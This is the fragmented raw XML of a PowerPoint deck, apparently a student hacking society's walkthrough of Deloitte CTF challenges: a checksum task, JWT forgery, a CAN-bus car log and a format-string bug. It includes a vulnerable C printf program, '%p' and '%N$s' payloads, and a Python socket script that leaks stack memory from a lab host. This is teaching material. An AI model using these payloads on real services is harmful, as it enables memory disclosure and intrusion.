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7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69" r:id="rId3"/>
    <p:sldId id="367" r:id="rId4"/>
    <p:sldId id="368" r:id="rId5"/>
    <p:sldId id="366" r:id="rId6"/>
    <p:sldId id="369" r:id="rId7"/>
    <p:sldId id="371" r:id="rId8"/>
    <p:sldId id="370" r:id="rId9"/>
    <p:sldId id="356" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="372" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="376" r:id="rId14"/>
    <p:sldId id="377" r:id="rId15"/>
    <p:sldId id="373" r:id="rId16"/>
    <p:sldId id="379" r:id="rId17"/>
    <p:sldId id="380" r:id="rId18"/>
    <p:sldId id="378" r:id="rId19"/>
    <p:sldId id="382" r:id="rId20"/>
    <p:sldId id="383" r:id="rId21"/>
    <p:sldId id="384" r:id="rId22"/>
    <p:sldId id="381" r:id="rId23"/>
    <p:sldId id="386" r:id="rId24"/>
    <p:sldId id="403" r:id="rId25"/>
    <p:sldId id="385" r:id="rId26"/>
    <p:sldId id="388" r:id="rId27"/>
    <p:sldId id="389" r:id="rId28"/>
    <p:sldId id="390" r:id="rId29"/>
    <p:sldId id="387" r:id="rId30"/>
    <p:sldId id="394" r:id="rId31"/>
    <p:sldId id="391" r:id="rId32"/>
    <p:sldId id="393" r:id="rId33"/>
    <p:sldId id="395" r:id="rId34"/>
    <p:sldId id="396" r:id="rId35"/>
    <p:sldId id="397" r:id="rId36"/>
    <p:sldId id="399" r:id="rId37"/>
    <p:sldId id="398" r:id="rId38"/>
    <p:sldId id="400" r:id="rId39"/>
    <p:sldId id="401" r:id="rId40"/>
    <p:sldId id="392" r:id="rId41"/>
    <p:sldId id="406" r:id="rId42"/>
    <p:sldId id="404" r:id="rId43"/>
    <p:sldId id="405" r:id="rId44"/>
    <p:sldId id="407" r:id="rId45"/>
    <p:sldId id="408" r:id="rId46"/>
    <p:sldId id="409" r:id="rId47"/>
    <p:sldId id="374" r:id="rId48"/>
    <p:sldId id="410" r:id="rId49"/>
    <p:sldId id="412" r:id="rId50"/>
    <p:sldId id="411" r:id="rId51"/>
    <p:sldId id="413" r:id="rId52"/>
    <p:sldId id="414" r:id="rId53"/>
    <p:sldId id="415" r:id="rId54"/>
    <p:sldId id="416" r:id="rId55"/>
    <p:sldId id="417" r:id="rId56"/>
    <p:sldId id="41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82"/>
    <p:restoredTop sz="85445"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="-1626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3EBAE-2337-CE4A-A94C-30DCB380E00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26346-57E3-CB41-A2F8-D563071F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87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3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9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8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10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4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03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5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1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5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4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2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9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02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79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59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76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84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72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02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70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25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64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0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78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2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2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62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42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15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4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5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44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8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57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88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64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88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88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88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57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8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8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71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36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4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9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6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1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5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2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2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9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2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CBC2-7245-9C49-B52E-899385C2AAD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7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 r="5389" b="28775"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-53009"/>
            <a:ext cx="12231757" cy="6970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64" y="1411874"/>
            <a:ext cx="3415872" cy="398124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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>dmuhackers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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>dmuhackers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687" y="146312"/>
            <a:ext cx="588723" cy="58872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8" y="29319"/>
            <a:ext cx="801442" cy="78007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532990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613118"/>
            <a:ext cx="115824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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deloitte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CTF Challenges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613118"/>
            <a:ext cx="115824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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSC150 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Data Integrity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8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0100"/>
            <a:ext cx="12192000" cy="26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 t="7181" r="33453" b="32309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770119" y="257968"/>
            <a:ext cx="4651762" cy="63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 t="7181" r="33453" b="32309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770119" y="257968"/>
            <a:ext cx="4651762" cy="634191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7487801" y="526093"/>
            <a:ext cx="250521" cy="501041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728260"/>
            <a:ext cx="11582401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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>43 = C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>54 = T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>46 = F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 t="7181" r="33453" b="32309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770119" y="257968"/>
            <a:ext cx="4651762" cy="634191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872754" y="526093"/>
            <a:ext cx="3603812" cy="186601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 t="7181" r="33453" b="32309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770119" y="257968"/>
            <a:ext cx="4651762" cy="634191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7490012" y="526093"/>
            <a:ext cx="255494" cy="200048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613118"/>
            <a:ext cx="115824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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checksum of some kind?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1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3" t="10182" r="2526" b="6909"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499062" y="457065"/>
            <a:ext cx="9193876" cy="59438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73744" y="3036537"/>
            <a:ext cx="1763274" cy="255304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2497976"/>
            <a:ext cx="115824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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hoodies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1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3" t="10182" r="3132" b="6666"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731818" y="577734"/>
            <a:ext cx="8728363" cy="57025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57600" y="2824223"/>
            <a:ext cx="3424844" cy="151733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 t="7181" r="33453" b="32309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770119" y="257968"/>
            <a:ext cx="4651762" cy="634191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872754" y="526093"/>
            <a:ext cx="3603812" cy="186601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44390" r="19218" b="37985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498764" y="1330038"/>
            <a:ext cx="5320146" cy="126353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593571" y="712693"/>
            <a:ext cx="1446414" cy="60480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3" t="34001" r="25581" b="52181"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533803" y="1812177"/>
            <a:ext cx="4455623" cy="9476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7625219" y="712694"/>
            <a:ext cx="787262" cy="10994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476565" y="529382"/>
            <a:ext cx="311947" cy="183312"/>
          </a:xfrm>
          <a:prstGeom prst="round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634762" y="2398750"/>
            <a:ext cx="3390387" cy="194821"/>
          </a:xfrm>
          <a:prstGeom prst="round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83824" y="1482160"/>
            <a:ext cx="1710489" cy="21363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0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2497976"/>
            <a:ext cx="115824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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRC-16-CCITT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2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20" y="629920"/>
            <a:ext cx="5598160" cy="55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728260"/>
            <a:ext cx="11582401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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Disabled Login Form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" t="35637" r="8320" b="32364"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1984346"/>
            <a:ext cx="12192000" cy="288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51" y="497032"/>
            <a:ext cx="9382298" cy="586393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214363" y="4000813"/>
            <a:ext cx="1763274" cy="255304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214363" y="4000813"/>
            <a:ext cx="1763274" cy="255304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9" t="3879" r="4646" b="12969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517806" y="471710"/>
            <a:ext cx="9156388" cy="591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214363" y="4000813"/>
            <a:ext cx="1763274" cy="255304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3861" r="5296" b="13230"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1690254" y="586046"/>
            <a:ext cx="8811492" cy="568590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084130" y="2111433"/>
            <a:ext cx="3211971" cy="182879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905506"/>
            <a:ext cx="11582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eyJhJ9.eyJUiLc91cyJ9.I1f2zx_zp60v8wHI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="115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6440" y="0"/>
            <a:ext cx="6177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*Simplified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2497976"/>
            <a:ext cx="115824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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funding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9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914400"/>
            <a:ext cx="7937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613118"/>
            <a:ext cx="115824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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="11500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = JSON Web Tokens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07" y="642504"/>
            <a:ext cx="8916785" cy="55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905506"/>
            <a:ext cx="11582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eyJhJ9.eyJUiLc91cyJ9.I1f2zx_zp60v8wHI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="115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6440" y="0"/>
            <a:ext cx="6177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*Simplified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0604" y="2111433"/>
            <a:ext cx="266007" cy="1213658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025305" y="2111433"/>
            <a:ext cx="266007" cy="1213658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905506"/>
            <a:ext cx="11582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eyJhJ9.eyJUiLc91cyJ9.I1f2zx_zp60v8wHI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="115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6440" y="0"/>
            <a:ext cx="6177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*Simplified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8764" y="2111433"/>
            <a:ext cx="3275214" cy="1213658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3" t="28606" r="6576" b="51757"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815361" y="1724891"/>
            <a:ext cx="10561277" cy="34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905506"/>
            <a:ext cx="11582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eyJhJ9.eyJUiLc91cyJ9.I1f2zx_zp60v8wHI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="115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6440" y="0"/>
            <a:ext cx="6177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*Simplified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73236" y="2003476"/>
            <a:ext cx="6948708" cy="1213658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t="29643" r="6653" b="39812"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724238" y="1225631"/>
            <a:ext cx="8743523" cy="44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905506"/>
            <a:ext cx="11582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eyJhJ9.eyJUiLc91cyJ9.I1f2zx_zp60v8wHI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="115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6440" y="0"/>
            <a:ext cx="6177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*Simplified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16537" y="3595255"/>
            <a:ext cx="8957251" cy="1213658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288684" y="2116994"/>
            <a:ext cx="538288" cy="1213658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8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3" t="31031" r="6717" b="44485"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530501" y="1591887"/>
            <a:ext cx="9130997" cy="367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15" y="1884418"/>
            <a:ext cx="7497969" cy="30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613118"/>
            <a:ext cx="115824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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forge Our Own JWT?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5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5" y="658091"/>
            <a:ext cx="8866909" cy="55418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87414" y="3462249"/>
            <a:ext cx="1027539" cy="211975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3" t="7273" r="9873" b="14909"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010213" y="760614"/>
            <a:ext cx="8828117" cy="533677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45646" y="1583575"/>
            <a:ext cx="2659606" cy="494607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53668" y="2267990"/>
            <a:ext cx="2590332" cy="192578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8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3" t="31031" r="6717" b="44485"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530501" y="1591887"/>
            <a:ext cx="9130997" cy="367422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45152" y="3761509"/>
            <a:ext cx="3091866" cy="494607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45" b="78182"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="765184" y="1957647"/>
            <a:ext cx="10659130" cy="29427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436992" y="3645131"/>
            <a:ext cx="1329568" cy="245225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2" t="40000" r="10061" b="37212"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934244" y="1857894"/>
            <a:ext cx="8323512" cy="314221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77909" y="3695007"/>
            <a:ext cx="2825858" cy="494607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4105" r="7901" b="13033"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698567" y="601470"/>
            <a:ext cx="8794866" cy="565506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98567" y="1417320"/>
            <a:ext cx="3039688" cy="494607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572596" y="2134987"/>
            <a:ext cx="3253048" cy="209202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475129"/>
            <a:ext cx="1158240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EXP800 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="8800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bitcoin Format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faucet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="88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b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" b="1" cap="all" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POINTS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SUCH A WEIRD ENVIRONMENT WE'RE IN</a:t>
            </a:r>
          </a:p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1026" name="Picture 2" descr="https://writeups.hattonsec.com/assets/thi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" y="234649"/>
            <a:ext cx="7143750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83611" y="234649"/>
            <a:ext cx="38553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immediately tried to see if it was a format string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by typing '%p' and it returned the next memory address on the stack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>so I knew that’s what this challenge was.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1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16" y="234649"/>
            <a:ext cx="11343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</a:rPr>
              <a:t>Format string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36308" y="1381214"/>
            <a:ext cx="3719384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base"/>
            <a:endParaRPr lang="en-GB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statement with format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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("my name is : %s\n",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“Chris");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My name is :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</a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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94654" y="4007739"/>
            <a:ext cx="300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Proper use of a format string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8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16" y="234649"/>
            <a:ext cx="11504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</a:rPr>
              <a:t>Format string vulnerability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2551" y="1025611"/>
            <a:ext cx="3571103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 simple C program with format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string vulnerability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#include&lt;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pPr fontAlgn="base"/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main(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char**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char buffer[100];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strncpy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(buffer,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[1], 100);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// We are passing command line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// argument to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(buffer);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return 0; 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9070" y="1025611"/>
            <a:ext cx="6815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Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has a variable number of arguments, it must use the format string to determine the number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arguments.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In this case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the attacker can pass the string “%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p” and fool the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> into thinking it has 15 arguments. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now it will print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the next 15 addresses on the stack, thinking they are its arguments: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7925" y="3287768"/>
            <a:ext cx="7191632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./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a.out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"%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-GB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0xffffdddd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0x64 0xf7ec1289 0xffffdbdf 0xffffdbde (nil) 0xffffdcc4 0xffffdc64 (nil) 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233651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16" y="234649"/>
            <a:ext cx="11504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</a:rPr>
              <a:t>Format string vulnerability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2551" y="1025611"/>
            <a:ext cx="4522573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time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socket import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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grab(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 = socket(AF_INET, SOCK_STREAM)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s.connect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(('10.6.0.2', 7777))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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s.send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("%"+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)+"$s" + "\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/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data =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s.recv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(64)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try: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data.split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()[0]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except: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"error"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print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s.close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fontAlgn="base"/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z in range(0,200):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grab(z)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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time.sleep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5189" y="1025611"/>
            <a:ext cx="60491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We know that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>everytime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we type %p we get a reference to somewhere on the stack which could have valuable information for us.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We can use %s to read what’s actually in memory at those points on the stack.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%1$s would print data from the next address on the stack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%2$s would print data from the second address on the stack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Etc..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Write a script to do this for you because you could be here all a while…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8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16" y="234649"/>
            <a:ext cx="11504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</a:rPr>
              <a:t>Format string vulnerability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writeups.hattonsec.com/assets/fourt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030888"/>
            <a:ext cx="714375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8" y="422987"/>
            <a:ext cx="115824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75 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POINTS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONNECTED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean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The Chinese competitor of Tesla hacked Elon Musk`s Internet connected "smart" car. They can view the information shown on the dashboard and sniff the traffic on the CAN bus. They made a recording of the dashboard and a capture of the CAN bus while Musk opened the door of his car, got in, closed the door and drove off.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/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/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Can you find the CAN messages that opened and closed Musk`s car </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>door?</a:t>
            </a:r>
          </a:p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Flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>format: ID#DATA+ID#DATA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459211"/>
            <a:ext cx="70770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2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938213"/>
            <a:ext cx="65913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37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8432" y="1151453"/>
            <a:ext cx="1098927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 Controller Area Network (CAN bus) is a robust vehicle bus standard designed to allow microcontrollers and devices to communicate with each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>other.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The log file is the traffic sniffed from the CAN bus which shows every single operation that’s taking place inside the car.. including opening and closing the door. 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4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48" y="372023"/>
            <a:ext cx="4551334" cy="3926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2" y="2048762"/>
            <a:ext cx="5183389" cy="44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1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64" y="3040018"/>
            <a:ext cx="3559865" cy="35598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30" y="362720"/>
            <a:ext cx="4508500" cy="450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410265"/>
            <a:ext cx="3489187" cy="21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7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8641</TotalTime>
  <Words>652</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>152</Paragraphs>
  <Slides>56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</cp:lastModifiedBy>
  <cp:revision>147</cp:revision>
  <cp:lastPrinted>2018-10-19T09:49:25Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-13T11:45:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-15T15:05:28Z</dcterms:modified>
</cp:coreProperties>
</file>